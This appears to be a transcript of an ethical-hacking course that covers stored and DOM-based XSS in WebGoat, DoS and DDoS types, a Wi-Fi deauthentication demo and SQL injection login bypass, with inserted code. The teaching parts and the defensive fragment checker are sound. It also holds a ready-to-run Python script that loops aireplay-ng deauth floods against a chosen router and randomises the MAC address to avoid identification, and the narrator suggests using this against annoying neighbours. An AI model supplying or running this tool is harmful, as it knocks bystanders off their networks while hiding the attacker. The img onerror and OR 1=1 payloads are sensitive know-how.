So this is also a very


good example now we

have two scripts actually


running on this page.

So the first one is

actually this is an example of


cross-site scripting persistent.

So that was the second one


and then comes the hello world.

So that's actually two scripts


running back to back.

So if anybody, or I, were
to actually come back
to this site any other day
and these comments
still existed, they would just
get automatically executed
from the database,
just because we
are referring to it.
Okay, so time for
DOM-based cross-site scripting,
and I was using this application
for the first time yesterday
and I realized
that there is actually
no way that we
can actually test DOM-based
cross-site scripting here.

So to actually test
DOM-based cross-site scripting
we are going to be using
this thing called WebGoat.

Now the login credentials
to WebGoat are guest
for the username
and guest for the password.

I'd already logged in


so it didn't ask me.

So now if we go out here
and go to Cross-Site
Scripting (XSS),
you will also see
that there is no option
available for DOM-based
cross-site scripting. This is
because it's under
AJAX Security.

It is under AJAX Security
because, if you guys remember,
we had just discussed
that DOM-based cross-site
scripting is a client-side
cross-site scripting.

So things like a normal script
would normally be checked
on the server side.
But when we are talking
about the client side,
we are talking about
HTML, AJAX, etc.,
so you can put your payload
in HTML form.

So let's input a script first.
Suppose we go
script, hello world.

Now, if we go and submit the solution,
nothing actually happens,
because a script tag that is inserted
into the page through innerHTML
is not executed by the browser.
It's the DOM sink that is unencoded,
so we need a payload
that runs without a script tag.

Now if we were to actually go in
and input something in a language
that the client side actually
understands, for example HTML,
we immediately get a result.

So first of all,
it's going to actually
manipulate the innerHTML
property of this site.

So if we go img
and we put a src, now
let's not give the src
anything valid, and on error
we're going to run
some simple JavaScript, so alert,
and we can say this is
an example of DOM-based XSS.

Now as soon as I
end the image tag,
this is going to get run,
because the client side
is always rendering
the client-side page.

So watch this.

Sorry, I think
I mistyped somewhere.

Let's go again, so img.
Let's use something I've
already used, and you can see
that it says hacked, and out here
we've not even
pressed submit solution.

So out here you can see
that as soon as we completed it,
it is again saying hacked, so
that means as soon as you
complete the query, or
the client-side HTML,

so that will completely
trigger the cross-site scripting
payload in the image tag.


Firstly, let's go
over what DDoS means. Now,
to understand a DDoS attack,
it is essential to understand
the fundamentals of a DoS attack.
DoS simply stands
for denial of service.

The service could be


of any kind for example,

imagine your mother


confiscate your cellphone

when you are preparing


for your exams to help you study

without any sort of distraction

While the intentions of
your mother are truly out of care

and concern you are being denied


the service of calling

and any other service offered


by your cell phone now

with respect to a computer


and computer networks.

A denial of service
could be in the form
of hijacking web servers,
overloading ports
with requests, rendering
them unusable, denying
wireless authentication
and denying any sort of service
that is provided
on the internet. Attacks

of such intent can be performed


from a single machine

While single-machine attacks
are much easier to execute
and monitor, they are also easy
to detect and mitigate.

To solve this issue,

The attack could be executed


from multiple devices spread

across a wide area.

Not only does this make


it difficult to stop the attack

but it also becomes


near impossible to point out.

The main culprit such attacks


are called distributed denial

of service or DDOS attacks.

Now, let us see how they work


The main idea of a DoS
attack, as explained,
is making a certain service
unavailable. Since everything
that is attacked is
in reality running on a machine,
the service can
be made unavailable
if the performance of
the machine can be brought down.

This is the fundamental


behind dose and DDOS attacks.

Now some dos attacks


are executed by flooding servers

with connection requests


until the server is overloaded

and is deemed useless; others
are executed by sending
malformed packets to a server
which it is unable
to handle.

These methods,
when executed by a botnet,
exponentially increase
the amount of damage
that they are doing,
and their difficulty
to mitigate increases in leaps
and bounds. To understand more
about how these attacks work,

Let us look at the different


types of attacks.

Now while there are plenty of


ways to perform a DDOS attack.

I'll be listing down


the more famous ones.

These methodologies have become


famous due to their success rate

and the Damage they


have caused over time.

It is important to note
that with the advancement
in technology,
the more creative minds
have devised more
devious ways to perform
DoS attacks.

Now the first


type of methodology

that we are going to discuss


is called ping of death. Now,
according to the IP protocol,
the maximum size
of an IP packet can be
65,535 bytes. The ping

of death attack exploits


this particular fact

in this type of attack.

The attacker sends packets
that, when the packet fragments
are added up, are more than
the max packet size.
Computers generally do not know
what to do with such
packets and end up freezing
or sometimes crashing
entirely.

Then we come
to reflected DoS.
This particular attack
is more often than not used
with the help of a botnet.
The attacker uses the botnet
to send a host
of innocent computers,
which are also called reflectors,
a request (classically an ICMP
echo request sent to a network's
broadcast address).

Now this request
that comes from the botnet looks
like it comes from the victim,
and this is done
by spoofing the source address
in the packet header.
This makes the host
of computers send
their replies to
the victim computer.
Since there are
multiple such replies
from the different computers
to the same machine, this
overloads the computer
and crashes it. This type
of attack is also known
as a Smurf attack.

Another type of attack is called
mail bomb. Now, mail bomb attacks
generally attack email
servers. In this type
of attack, instead of packets,
oversized emails filled with
random garbage values are sent
to the targeted email server.
This generally crashes
the email server
due to a sudden spike in load
and renders it useless
until fixed.

Last but not the least, we
have the teardrop attack.

So in this type of attack,
the fragmentation offset field
of a packet is abused.
One of the fields
in an IP header is the fragment
offset field, indicating
the starting position, or offset,
of the data contained
in a fragmented packet
relative to the data
in the original packet.
If the sum of the offset
and the size of one fragmented
packet is greater than the offset
of the next fragmented packet,
the packets overlap. Now,
when this happens, a server
vulnerable to teardrop attacks
is unable to reassemble
the packets, resulting
in a denial
of service condition.
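The two fragment-handling bugs just described, ping of death and teardrop, are both caught by the same bounds checks in a careful reassembler. The following is an added example that is not part of the course: a fragment is represented by the three IPv4 header fields that matter here (the 13-bit Fragment Offset in units of 8 bytes, the More Fragments flag and the payload length), and the attack fragment sets are constructed inline; nothing is read from the network.

```javascript
// Added example (not from the course): the checks a defensive IP
// reassembler applies before accepting fragments.

const MAX_IP_DATAGRAM = 65535; // 16-bit Total Length field, header included
const IPV4_HEADER_LEN = 20;    // minimal IPv4 header

// Split a datagram payload into fragments the way a legitimate sender does:
// every fragment but the last carries a multiple of 8 bytes.
function fragmentDatagram(totalPayload, maxFragPayload) {
  const step = maxFragPayload - (maxFragPayload % 8);
  const frags = [];
  for (let pos = 0; pos < totalPayload; pos += step) {
    const len = Math.min(step, totalPayload - pos);
    frags.push({ offset: pos / 8, moreFragments: pos + len < totalPayload, payloadLength: len });
  }
  return frags;
}

// Returns { verdict, detail } where verdict is:
//   'ok'        the fragments can be reassembled,
//   'oversized' ping of death: the reassembled datagram would exceed 65,535 bytes,
//   'overlap'   teardrop: a fragment starts before the previous one ends.
function checkFragments(fragments) {
  const sorted = [...fragments].sort((a, b) => a.offset - b.offset);
  let expectedNext = 0; // first payload byte not yet covered
  for (const f of sorted) {
    const start = f.offset * 8;
    const end = start + f.payloadLength;
    if (IPV4_HEADER_LEN + end > MAX_IP_DATAGRAM) {
      return { verdict: 'oversized', detail: `fragment at ${start} ends at byte ${end}` };
    }
    if (start < expectedNext) {
      return { verdict: 'overlap', detail: `fragment at ${start} overlaps data up to ${expectedNext}` };
    }
    expectedNext = end; // gaps are allowed: fragments may still be in flight
  }
  return { verdict: 'ok', detail: `${expectedNext} payload bytes reassembled` };
}

// Constructed attack fragment sets.
// Ping of death: a last fragment placed near the top of the offset range so
// that offset*8 + payload + header exceeds 65,535.
const PING_OF_DEATH = [
  { offset: 0, moreFragments: true, payloadLength: 1480 },
  { offset: 8189, moreFragments: false, payloadLength: 40 }, // 65512 + 40 = 65552
];
// Teardrop: the second fragment claims to start inside the first one.
const TEARDROP = [
  { offset: 0, moreFragments: true, payloadLength: 36 },
  { offset: 3, moreFragments: false, payloadLength: 12 },   // starts at byte 24 < 36
];

const LEGIT = fragmentDatagram(3000, 1480);
console.log('legit        :', checkFragments(LEGIT));
console.log('ping of death:', checkFragments(PING_OF_DEATH));
console.log('teardrop     :', checkFragments(TEARDROP));
```

A real stack also has to hold partially reassembled datagrams in a bounded, timed-out buffer, otherwise the reassembly table itself becomes the resource that an attacker exhausts.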

Okay.

So that was all the theoretical


portion of this video now,

it's time to actually perform


our very own DDOS attack.

Okay.

So now that we have finished
the theoretical part
of how DDoS actually works,
what it actually is,
and its different types,

Let me just give you guys
a quick demonstration on
how you could apply a denial
of service attack
on a wireless network
around you (one you own
or are authorized to test).
This could be
somewhere like Starbucks
where you're sitting,
or this could be a library,
or your college
institution; no matter
where you're sitting,
this procedure will work.

So the first thing we want to do
is actually open up a terminal,
because we will be doing
most of our work
on the command line.

Now for this


particular demonstration.

We will actually be using
two tools. First is aircrack-ng,
which is a suite of tools
that contains aircrack-ng,
airmon-ng, aireplay-ng
and airodump-ng.
So these are the four tools
that come along with it.

And the second one
that we'll be using
is called macchanger. Okay.

So let me just put


my terminal on maximum.

So you guys can see


what I'm actually writing out.

So first thing we want to do


is Actually log in as root.

So let me just do that quickly

because we need to login as


root because most of the stuff

that we're going to do right now


will need administrator access.

Now.

Now, the first thing we
want to do is check out
our wireless network card's name,

and we can do that easily


by typing ifconfig.

Now, you can see
that my wireless card is called
wlo1, and we get the MAC address
and we also get the IPv6 address.

So that's my wireless network
card, and we'll actually be setting
that up in monitor mode. Now,
before we actually go in
to start up our network
card in monitor mode,
let me just show you
how you can install
the two tools that I just spoke
about, that is aircrack-ng
and macchanger.

So to install aircrack-ng,
you can just go apt-get
install aircrack-ng, hit enter,
and this should do it for you.
I already have it installed,
so it's not going to do much.

To install macchanger,
you could just go
the same command,
that is apt-get
install macchanger,
and you can check
if both the tools
have been installed properly
by opening the manual pages,
by typing man aircrack-ng,
and this will open up
the manual page for you.
And let's also do
the same for macchanger to ensure
it's installed.

So what we're going


to do first is set up

our network interface card


into monitor mode.

So to do that,
all we have to do
is type ifconfig,
and we need to put
the network interface card down.
So we go
ifconfig wlo1 down, and then
the command iwconfig with mode monitor.
Don't forget to specify
the interface that
you're working on.
So iwconfig wlo1 mode monitor,
and all you have to do
now is put it back up.
So what we are going
to type is ifconfig
wlo1 up.

You can check the mode:
it will say Managed
or Monitor.
So as you guys can see,
it shows the mode,

So that's how we're going
to go ahead. So you can check
that just for your own purposes,
and we can also check for only
wlo1 by
specifying the interface.

Or you could also check
the mode only, by passing it
through a pipe,
and that is using grep Mode.
So iwconfig wlo1 | grep Mode,
with Mode beginning
with a capital M.
So that's how you
would probably return it.
So as you guys can see,
that has returned
the mode for us,
along with the access point
and the frequency.

Okay, so that was
a little fun trivia on
how you could fetch the mode
from a certain command
like iwconfig
by passing it through a pipe
to grep; grep
basically means grab.

Okay, so now moving on we


will get to the more

important stuff now so


firstly we need to check
for some sub-processes
that might still be running and
that might actually interfere
with the scanning process.

So to do that,

what we do is airmon-ng check

and then the name


of the interface now

as you guys can see I have


the network manager

that is running out here


and we need to kill that first

and that can be easily


done by going kill

with the PID after that.

You can run
a general command called
airmon-ng check kill,
so whatever it finds
it will kill accordingly,
and when it produces
no results like this,
that means you're ready to go,
as there are
no sub-processes running
that might actually
interfere with our scan.

Now what we want to do
is run airodump-ng
on the network interface card
and check out all
the possible access points
that are available to us.

So as you guys can see


this produces a bunch

of access points and they come
with their BSSIDs.

So we have the power,
which is the PWR column,
that is the power of the signal,
and let me go down back again.

So yeah, you can see the beacons


you can see the data you can see

the channels available


and what the bssid is.

It's the MAC address
that is actually tied
in with the ESSID,
which basically represents
the name of the router.

Now, what we want to do


from here is we want

to choose which router


we want to actually dose.

Now, the whole process
of DoSing is actually that
we will continuously
deauthenticate all the devices
that are connected to it.

So for now I have chosen
the Edureka Wi-Fi to actually
DoS, and once I send it
the deauthentication broadcast,
it will actually
deauthenticate all the devices
that are connected to it.

Now this deauthentication
is done with a tool
called aireplay-ng,
which is a part of
the aircrack-ng suite of tools.

Now.

Let's just see
how we can use aireplay-ng
by opening up the help.
So we go aireplay-ng --help
and this opens up
the help for us.

Now as you guys
can see, it shows us
that we can send a deauthentication
message by typing in -0,
and then we need
to type in the count.
So what we are going
to do is type in -0,
which will send
the deauthentication message,
and now we can type 1 or 0.
So 1 will send only
one deauthentication message,
while 0 will continuously
loop it and send a bunch
of deauthentication messages.

We are going to say zero
because we want to be sure
that we are deauthenticating
everybody, and we can also
specify a particular client
that we want to specifically
deauthenticate, but for
this demonstration,
I'm just going to try
and deauthenticate everybody
that is there.

So what we are going to do is copy down the MAC address, or the BSSID as you would know it, and then we are going to run the deauthentication.

Now as you guys can see, the deauthentication is beginning to hunt on channel 9. Now as you guys know, and as I already know, our BSSID or MAC address is working on channel 6. We can easily change the channel that our interface is working on by just going iwconfig wlan1 channel and then specifying the channel. As you guys can see, our chosen router is working on channel 6, so that's exactly what we're going to do.

Now as you guys can see, it immediately starts sending the deauthentication frames to the specified router, and this will actually make any device that is connected to that router almost unusable.

You might see that you are still connected to the Wi-Fi, but try browsing the internet with it and you will never be able to actually reach any site, as I'm constantly deauthenticating you. Your device will need to redo the handshake all the time, and even if it completes, you are suddenly deauthenticated again because I'm running this thing in a loop.

Now, you can let this command run for a few moments or for however long you want to DoS that guy. Well, this is not exactly a DDoS because you're doing it from one single machine, but you can also tweak this so that it looks like it's running from several different machines.

So let me just show you how to do that. We are going to write a script file to actually optimize our code a little. So this script file will actually automate most of the things that we just did, and also optimize it a little by changing our MAC address every single time, so we become hard to actually point out.

So the first thing that we want to do is put our wireless network card down, and maybe that's not the first thing that I want to do. Just give me a moment to think about this. I haven't actually thought this through, I'm doing this on the fly.

Okay. So the first thing that we're going to do is start a while loop that is going to continuously run until we actually externally stop it. So we go while true and then we're going to say do, and the first thing that we want to do is send out the deauthentication message. We are going to send around 10 deauthentication messages, and we want to run it on a specific BSSID. So that is the BSSID that I had copied, so let me just put that in, and then we just put in the interface it is supposed to work on.

Now what we want to do after that is change the MAC address after we have sent all these 10 packets. So what we will need to do is put down our wireless network, and as already discussed we can do that with ifconfig wlan0 down. And now what we want to do is change our MAC address, so we can do that with the simple tool that we had installed, saying macchanger -r. So let me just open up a quick tab and show you guys how macchanger actually works.

Now, you can already check out my other video called the ethical hacking course, which actually covers a lot of topics, and macchanger is just one of them, and you can check how to use it in depth in that video. But for now, let me just give you a brief introduction to how macchanger works. macchanger will basically give you a new MAC address every time. Let me just open up the help menu for you guys.

So as you guys can see, these are the options that are available to us. We can get a random MAC address, we can also tell it to show our MAC address, and we also have to specify the interface when we want it to show us the MAC address. Now let me just generate a new MAC address. So you see that "interface up or insufficient permissions" is being shown. This means we always have to put down our interface first. So let me just do that quickly: ifconfig wlan0 down. And now what we want to do is give ourselves a new MAC address, and boom, roasted. We already have a new MAC address, as you guys can see from the "New MAC" line.

Now if you put our network interface card back up and then try and show the MAC address again, we see that our current MAC and our permanent MAC are two completely different MAC addresses, and the current MAC and the new MAC are identical. So this is how you can actually generate new MAC addresses to spoof your own identity on the wireless network, and that is very useful in this case, because the person you're attacking will be so confused as to what to do, because your MAC address is changing every time and there's no real solution to the situation that you're creating for them. At least, I don't know of any solution. If you do know how to stop this for yourself, please leave it down in the comment section below and help the world a little bit.

Now, we also want to get to know what our MAC address is every time. So let me just pipe the whole thing through and try and grab the new MAC address: macchanger -r wlan1 and grep for MAC. Then we want to put our wireless card in monitor mode, and then we also want to bring our network interface card back up.

Now what we want to do out here is optimize it so we can be attacking constantly. So let us put in a sleep timer. This will make our program sleep for a particular amount of time. I'm going to make it sleep for 5 seconds. So after every 5 seconds it's going to send that particular BSSID the deauthentication messages, then it's just going to bring down my interface card, it's going to change my MAC address, it's going to put the interface card back in monitor mode and sleep for 5 seconds, and then repeat the entire process. And to end the script, let's just say done, so that will denote where the loop is done. Now let me just save it, Ctrl+O, Ctrl+X to exit, and there we go.

Okay. So first of all, to actually run this we need to give it some more permissions. So as you guys can see we already have it. Let me just put it in a much more readable format. Okay. So as you guys can see, our dos.sh doesn't really have execute permission, so we can fix that with the command chmod. So I'm going to give it execute permission: chmod u+x and then the name of the file. This will actually change our dos.sh into an executable bash script.

Okay. So it seems that we have made some error. So let's just go back into our bash script and check for the error that we have probably made. So nano dos.sh. Okay. So the thing that I am missing is that I forgot the -a that I'm supposed to put before the BSSID in the aireplay-ng part of the code. So let me just go ahead and quickly do that. Okay. So now that that is done, let me just save it and quickly exit and see if this thing is working.

Ok. So now we are trying out our script. Now you guys should know that this Edureka Wi-Fi is my company's Wi-Fi and I have complete permission to go ahead and do this to them. Also, my company's Wi-Fi is kind of secure, so every time it senses that a deauthentication message is being sent, it doesn't like that and it kind of changes the channel that it is working on. So these guys are really smart, smarter than me most of the time, and this time I'm just going to try and force them to work on channel 6. So let me just go ahead and run my script once.

Okay, so let me just check that they're still working on channel 6. Yep, they're still working on channel 6. Let me just check my script once, whether it's correctly done and whether I have the right MAC ID. Let me just copy in the MAC ID just to be sure once again. So there we go, copied it. Let's go into the script and paste it in.

Okay. So now that that is done and we have the MAC IDs and everything set up properly, let me just show you how to run the script. So you go dot slash and then dos.sh. Now I see that our interface is working on channel 8, so this will definitely not work, and it says that the BSSID was not found. So what we need to do, as I have shown you guys earlier, is go iwconfig wlan1 and change the channel to channel 6. Oops, I changed it to channel 8 again, this will not work. I'm sorry, that was my bad. So now that we have changed it to channel 6, you can see that it is sending everything immediately. Okay. So that is actually running our script very well.

And as you guys can see, because of the security measures taken by my company, it will not always work on channel 6. It will keep rotating now until it finds a safe channel. So it really can't find a safe channel while I'm always DoSing on channel 6, and it will run sometimes and it won't run sometimes, but with the unsecured Wi-Fi that is running at your home, this will mostly work a hundred percent of the time. So let me just stop this, because my company will go mad at me if I just keep on DoSing them.

So this brings us to the end of the demonstration. This is how you can always DoS your neighbors if they're annoying you, but remember, if you're caught you could be prosecuted. So this was about how DoS works, what DDoS actually is and the different types, and how you can do one on your own with your own system.
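Here is the scan-and-loop procedure from the demo written out as a Python script. This is an added example, not the course's own dos.sh: it parses the CSV that airodump-ng writes with --output-format csv (the dump embedded below is constructed, with made-up BSSIDs and network names), picks the target by ESSID, and issues the same iwconfig, aireplay-ng, ifconfig and macchanger commands the lecture types by hand, one round per loop pass. The interface name wlan0, the 10-frame count and the 5-second sleep are assumptions taken from the demo; running it for real needs root and a card in monitor mode.

```python
"""Scan parsing plus the deauth/MAC-rotation loop from the demo (added example)."""
import csv
import io
import subprocess
import time

# Constructed stand-in for the file airodump-ng writes with --output-format csv.
# It has the access-point table, a blank line, then the station table. All the
# MAC addresses and network names here are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   7, Edureka,
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  9,  54, WPA2, CCMP, PSK, -70,       30,        0,   0.  0.  0.  0,   9, Neighbour,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -50,      200, AA:BB:CC:DD:EE:01,
"""


def access_points(csv_text):
    """Return the AP table as dicts with the columns the demo reads off the screen."""
    ap_table = csv_text.replace("\r\n", "\n").split("\n\n", 1)[0]  # drop station table
    rows = csv.reader(io.StringIO(ap_table), skipinitialspace=True)
    header = [h.strip() for h in next(rows)]
    aps = []
    for row in rows:
        if not row:
            continue
        rec = dict(zip(header, (f.strip() for f in row)))
        aps.append({"bssid": rec["BSSID"], "channel": int(rec["channel"]),
                    "power": int(rec["Power"]), "essid": rec["ESSID"]})
    return aps


def find_target(csv_text, essid):
    """Pick the router by name, as the demo does, and return (bssid, channel)."""
    for ap in access_points(csv_text):
        if ap["essid"] == essid:
            return ap["bssid"], ap["channel"]
    raise LookupError(f"no access point named {essid!r} in the dump")


def set_channel_cmd(iface, channel):
    # Lock the card to the AP's channel; otherwise aireplay-ng reports the BSSID as not found.
    return ["iwconfig", iface, "channel", str(channel)]


def deauth_cmd(iface, bssid, count=10, client=None):
    # --deauth is the long form of -0; -a is the AP, -c (optional) a single station.
    cmd = ["aireplay-ng", "--deauth", str(count), "-a", bssid]
    if client:
        cmd += ["-c", client]
    return cmd + [iface]


def rotate_mac_cmds(iface):
    # macchanger refuses an interface that is up, so bring it down, randomise,
    # put it back in monitor mode and bring it up again.
    return [["ifconfig", iface, "down"],
            ["macchanger", "-r", iface],
            ["iwconfig", iface, "mode", "monitor"],
            ["ifconfig", iface, "up"]]


def dos_round(iface, bssid, channel, count=10, client=None):
    """One pass of the demo's while-true loop, as the list of commands it issues."""
    return [set_channel_cmd(iface, channel),
            deauth_cmd(iface, bssid, count, client)] + rotate_mac_cmds(iface)


def run_loop(iface, bssid, channel, rounds=0, runner=None, delay=5):
    """Run `rounds` passes (0 = until Ctrl-C), sleeping `delay` seconds between them.

    `runner` is called with each argv list; it defaults to subprocess.run.
    Returns every command issued, so the schedule can be checked without a Wi-Fi card.
    """
    runner = runner or (lambda cmd: subprocess.run(cmd, check=True))
    issued = []
    done = 0
    while rounds == 0 or done < rounds:
        for cmd in dos_round(iface, bssid, channel):
            runner(cmd)
            issued.append(cmd)
        done += 1
        if delay:
            time.sleep(delay)
    return issued


if __name__ == "__main__":
    bssid, channel = find_target(SAMPLE_CSV, "Edureka")
    # Dry run: show one pass of the loop instead of executing it.
    run_loop("wlan0", bssid, channel, rounds=1,
             runner=lambda cmd: print(" ".join(cmd)), delay=0)
```

The runner argument lets you print the commands instead of executing them, which is what the main block does; leave it unset to run them for real. Passing a station MAC as client adds the -c option the lecture mentions but does not use, limiting the deauth to one device. On an access point with 802.11w (Protected Management Frames) enabled, clients discard unauthenticated deauth frames, so the loop has no effect there.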

In the early days of the Internet, building websites was straightforward. There was no JavaScript, no back end, no CSS and very few images. But as the web gained popularity, the need for more advanced technology and dynamic websites grew. This led to the development of the Common Gateway Interface, or CGI as we call it, and server-side scripting languages like ASP, JavaScript, PHP and many others. Websites changed and started storing user input and site content in databases.

Each and every data field of a website is like a gate to the database. For example, in a login form the user enters the login data, in a search field the user enters a search text, and in a data-saving form the user enters the data to be saved. All this input data goes to the database. So if, instead of correct data, any malicious code is entered, then there are possibilities for some serious damage to happen to the database and sometimes to the entire system, and this is what SQL injection is all about.

I'm sure you've heard of SQL. Structured Query Language, or SQL, is a language which is designed to manipulate and manage data in a database. An SQL injection attack is a type of cyber attack that targets these databases using specially crafted SQL statements to trick the systems into doing unexpected and undesired things.

So by leveraging an SQL injection vulnerability present in a web application or website, given the right circumstances, an attacker can use it to bypass the web application's authentication: as in, if you have a login and password, the attacker can enter just the user ID, skip the password entry and get into the system. Or it can sometimes retrieve the content of an entire database. He can also use an SQL injection vulnerability to add, modify and sometimes delete records in a database, affecting data integrity. Using this vulnerability, an attacker can do unimaginable things. This exactly shows how dangerous an SQL injection can be.

Now let's check out how a typical SQL injection is carried out. Well, let's start with a non-technical explanation, guys. I have a simple analogy here. So first let's go through this; once you understand this, you will easily be able to relate it to what an SQL injection attack is.

So anyway, first imagine that you have a fully automated bus that functions based on the instructions given by a human through a standard web form. Well, that form might look something like this. For example, the form might say: drive through the route [route], and stop at the bus stop if [condition]. This route and this condition, that is, when the bus should stop, are the user inputs; this is where you will have to enter the input into the form. Now, after putting some data into the fields, it looks something like this: drive through Route 77 and stop at the bus stop if there are people at the bus stop. Well, that looks simple enough, right? So basically the human, or the person, is trying to give the instruction that the bus should drive through Route 77 and it should stop at the bus stop if there are people at the bus stop. Well, that sounds harmless.

Now imagine a scenario where someone manages to send these instructions, which look something like this: drive through Route 77 and do not stop at the bus stop and ignore the rest of the form if there are people at the bus stop. And now, since the bus is fully automated, it does exactly as instructed. It drives up Route 77 and does not stop at any bus stop, even when there are people waiting, because the instruction says do not stop at the bus stop and ignore the rest of the form. So this part, which is "if there are people at the bus stop", is ignored.

We were able to do this because the query structure and the supplied data are not separated properly, so the automated bus does not differentiate between the instructions and the data; it simply does anything that it is fed with or asked to do. Well, SQL injection attacks are based on the same concept. Attackers are able to inject malicious instructions into good ones, all of which are then sent to the database server through the web application.


And now the technical explanation. An SQL injection needs two conditions to exist: a relational database that uses SQL, and a user input which is directly used in an SQL query.

Let's say we have a simple SQL statement. This statement says: select from table users where username is so-and-so and password is so-and-so. Basically you can think of it as the code for a login form. It's asking for the username and the password. This SQL statement is passed to a function that sends the entire string to the connected database, where it will be parsed and executed, and it returns a result at the end.

If you have noticed, first, the statement contains some special characters, right? We have the asterisk to return all the columns for the selected database row, and then there is the equals sign to only return values that match the search string, and then we have single quotes here and here to tell the SQL database where the search string starts or ends. So for the user you have one starting here and ending here, and for the password here, so basically a pair.


Now consider the following example, in which a website user is able to change the values of this user and password, such as in a login form. So if the values are put into user and password, it looks something like this: select from the users table where the username is Dean and the password is Winchester. The SQL statement is simple enough, it's very direct. So if there is a user called Dean with password Winchester, then all the columns of that row of the users table are extracted.

Now suppose the input is not properly sanitized by the web application. The attacker can easily insert some malicious SQL statement like this: the username might be Dean' OR 1=1 followed by a double hyphen, and then password is equal to Winchester as before. So basically, along with the data, the user, or the attacker, has tried to enter a malicious SQL statement, disguising it as data here.

So guys, you need to notice two things here. First, we have OR 1=1. It's a condition that will always be true, therefore every row is accepted as a match by the database. For example, if Dean is not a valid user, or if there is no user called Dean in the database, the condition still holds, because there is an OR in between and our next value is 1=1, which always returns true. So basically our condition becomes something like "username is Dean or true", and if there is no user called Dean, the second half is still true, so every row matches and the values will be displayed.

The next part is the double hyphen. I'm sure you know what the double hyphen represents, right? Basically, it's commenting out the next part of the SQL query. So it instructs the SQL parser that the rest of the line is a comment and should not be executed. So the password part will be ignored. So basically what we're trying to do is bypass the password authentication here. Once the query executes, the SQL injection effectively removes the password verification, resulting in an authentication bypass. By using the double hyphen we're commenting out the rest of the query, and before that, by using 1=1, which is translated to true, we are trying to enter the database without even giving a valid value.

So the application will most likely log the attacker in with the first account from the query result, and as you guys know, most of the time the first account in a database is that of an administrative user. So basically by doing nothing, or basically by giving some random data here, the attacker was able to extract the admin details. It sounds very dangerous, right? So that's all an SQL injection attack is about.
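The login query from the explanation above, as an added Python example (not part of the course material): a vulnerable version that pastes the username and password straight into the SQL string, next to the parameterized version that keeps them as data. It uses an in-memory SQLite table with a constructed admin and Dean account; plaintext passwords are kept only so the query matches the lecture's SELECT. The payload is the Dean' OR 1=1 -- username described above.

```python
"""Login-form SQL injection and its fix, on SQLite (added example)."""
import sqlite3

PAYLOAD = "Dean' OR 1=1 --"   # the username from the explanation above


def make_db():
    """Constructed demo table: admin is inserted first, as the lecture assumes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("Dean", "Winchester")])
    db.commit()
    return db


def build_query(username, password):
    """The lecture's statement with the input pasted straight into the string."""
    return (f"SELECT id, username FROM users "
            f"WHERE username = '{username}' AND password = '{password}'")


def login_vulnerable(db, username, password):
    """Returns (id, username) of the first matching row, or None.

    With PAYLOAD the WHERE clause becomes
        username = 'Dean' OR 1=1 --' AND password = '...'
    so 1=1 matches every row and -- comments out the password check.
    """
    return db.execute(build_query(username, password)).fetchone()


def login_safe(db, username, password):
    """Same query with bound parameters: the quote and the -- never leave the data."""
    return db.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(build_query(PAYLOAD, "anything"))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("safe:      ", login_safe(db, PAYLOAD, "anything"))
```

The vulnerable function logs the attacker in as the first row, admin, with any password and with a username that need not exist; the parameterized one returns nothing for the same input and still accepts the real Dean/Winchester pair.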
